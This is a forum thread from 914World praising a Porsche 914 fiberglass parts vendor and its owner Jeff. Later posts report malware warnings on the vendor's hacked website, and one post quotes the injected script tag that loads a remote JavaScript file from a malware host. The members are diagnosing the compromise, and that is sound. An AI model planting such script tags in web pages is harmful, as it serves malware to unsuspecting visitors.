Help - Search - Members - Calendar
Full Version: QRS Fiberglass
914World.com > The 914 Forums > 914World Garage
kconway
I know this vendor has been talked about here before but I thought I'd give him a bump here.

I spoke to Jeff who does the layups himself a few weeks ago. He told me when I was ready to buy, give him a call and he would build some GT flared rockers for me. I told him they were going on a street car and he agreed to beef up the rockers at no charge (doubled the mat).

Well, I called him Monday to get him started and he told me he'd have them done today. I went out to his place in Hemet, CA today and couldn't be happier. The rockers came out very nice. He has a project 914 car in the shop that has his fiberglass fenders and decklids. Kinda nice since he can do fit checks on stuff like rockers when the come out of the mold. In all I saw 4 914's at his shop and he says he has 6 others at home. He also is getting into Boxster fiberglass production. He also does carbon fiber, saw a rear decklid in carbon that looked fantastic.

Also, I told him I wanted a flared front valance without the oil cooler cutout. He presently build the stocker valance in glass and a GT type. He agreed to piece together parts from each to do a custom valance for me w/o the oil cooler but with the flares. NO TOOLING OR SETUP CHARGES. I'll comment on that more when I receive it in a few weeks.

Anyway, I highly reccomend QRS fiberglass. Jeff's a super nice guy and very accomodating. See ebay for better photos.
Click to view attachment
Click to view attachment

Kev smilie_pokal.gif
McMark
Very cool! Website? Phone number?
kconway
QUOTE(McMark @ Jan 1 2009, 12:47 AM) *

Very cool! Website? Phone number?

QRS doesn't seem to have a website other then their ebay webstore. http://stores.ebay.com/QRS-Fiberglass-for-Porsches

You can reach Jeff directly at his shop at: 909-260-7303

I wish I had taken my camera! Some of the other things I saw he was producing were OEM look dash pads (wouldn't that be cool in CF?), piece between dashpad and windshield and decklids with integral tail.
911quest
I just ordered the whole shbang from these guys fenders,hood,trunk,bumpers,valence very nice and very light parts....I just wish the communcation was a little better but everything made it here.
ahdoman
I bought a set of decklids from them. I was quite impressed. Good bang for the buck.
martman
He has a website now.

www.qrsfiberglass.com
jim dorociak
I used all his parts for a 916 race car that I helped build. Drove to Hemet and personally met him and bought the parts. In fact when I mentioned the problem with the 916 front bumpers being all squished and out of shape he took one I had and made a correct mold and now produces a good front 916 bumper. Jim
Andyrew
LOVE the 914 he has on the wall!!
campbellcj
QUOTE(martman @ Sep 19 2010, 08:57 AM) *

He has a website now.

www.qrsfiberglass.com

FYI -- I got a malware alert on that link.

"The website at www.qrsfiberglass.com contains elements from the site dodo.busop.info, which appears to host malware"

I would be interested in a CF dash top if one becomes available at a non coronary-inducing price point...
jasons
QUOTE(campbellcj @ Sep 19 2010, 12:24 PM) *

He has a website now.

www.qrsfiberglass.com

"The website at www.qrsfiberglass.com contains elements from the site dodo.busop.info, which appears to host malware"

I would be interested in a CF dash top if one becomes available at a non coronary-inducing price point...

agree.gif

My Avast virus protection alarmed on that site like a month ago so I have been afraid to go back.
rick 918-S
QUOTE(jasons @ Sep 19 2010, 02:42 PM) *

He has a website now.

www.qrsfiberglass.com

agree.gif

My Avast virus protection alarmed on that site like a month ago so I have been afraid to go back.

agree.gif WTF.gif My Advast spanked that site hard!
Mike Bellis
My Norton had no problem with it. It runs an active scan and cleans as I go.
martman
QUOTE(rick 918-S @ Sep 19 2010, 06:35 PM) *

QUOTE(jasons @ Sep 19 2010, 02:42 PM) *

He has a website now.

www.qrsfiberglass.com

agree.gif

agree.gif WTF.gif My Advast spanked that site hard!

The site is fixed, now, not sure how it got hacked but took a while to clean it up.

jasons
QUOTE(martman @ Sep 19 2010, 10:25 PM) *

The site is fixed, now, not sure how it got hacked but took a while to clean it up.

Thanks for the update. You should open a thread in the vendors section.

EDIT: after I typed this, I went to the site and Avast still aborts the connection.
bmtrnavsky
I was having issues with internal links.
sean_v8_914
the 10jreen runs Jeff's deck lids. mine have a coromat center. they are firm, sandable and under 11 lbs. he said he coujld make lighter or stiffer street versions.
Jeff will make damn near any variation you can think of, just ask.
Britain Smith
I have one of his front bumpers...good quality peice.

-Britain
SirAndy

Nope, it's still there:

Line 239:
CODE
script type="text/javascript" src="http://dodo.busop.info:8080/Bcc.js"></script>

ar15.gif
SirAndy
QUOTE(SirAndy @ Sep 20 2010, 12:12 PM) *

Nope, it's still there:

Line 239:
CODE
script type="text/javascript" src="http://dodo.busop.info:8080/Bcc.js"></script>

ar15.gif

Actually, it looks like the above javascript link has been injected in each and every webpage on that domain!!!

This is BAD ... icon8.gif
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
Invision Power Board © 2001-2024 Invision Power Services, Inc.